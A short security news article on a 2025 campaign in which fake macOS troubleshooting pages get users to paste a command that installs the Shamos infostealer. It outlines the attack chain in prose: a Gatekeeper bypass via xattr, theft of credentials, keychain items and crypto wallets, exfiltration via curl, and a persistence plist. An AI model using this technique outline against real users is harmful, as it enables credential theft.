Fake Mac “Fix” Pages Push New Shamos Infostealer

by Justin Erickson

CrowdStrike reports a campaign (June–August 2025) that used search-ad malvertising and fake “help” sites to trick macOS users into pasting a one-line terminal command that downloads and runs the Shamos infostealer—an Atomic macOS Stealer (AMOS) variant linked to the COOKIE SPIDER group. The firm blocked attempts across 300+ customer environments. The command decodes a URL and pulls a bash script that captures the user’s password, “downloads SHAMOS Mach-O into the/tmp/directory, removes extended file attributes using xattr likely for bypassing Gatekeeper checks, assigns executable permissions via chmod, and then executes the stealer.” BleepingComputer and other outlets add that victims are funneled from ads and spoofed GitHub repos to “troubleshooting” pages (printer fixes, resolver cache flushing guides) that push the copy-paste command (“ClickFix”). Once executed, Shamos checks for and steals browser credentials, keychain items, Apple Notes data, and crypto-wallet files, zips them as out.zip, and exfiltrates them via curl. With sudo, it can persist via com.finder.helper.plist where it can then execute on system startup. The best way to keep yourself safe from attacks like these is to seek help on official company websites and community forums – as they are only effective if you click on and trust their fake, sponsored websites when searching the web.

---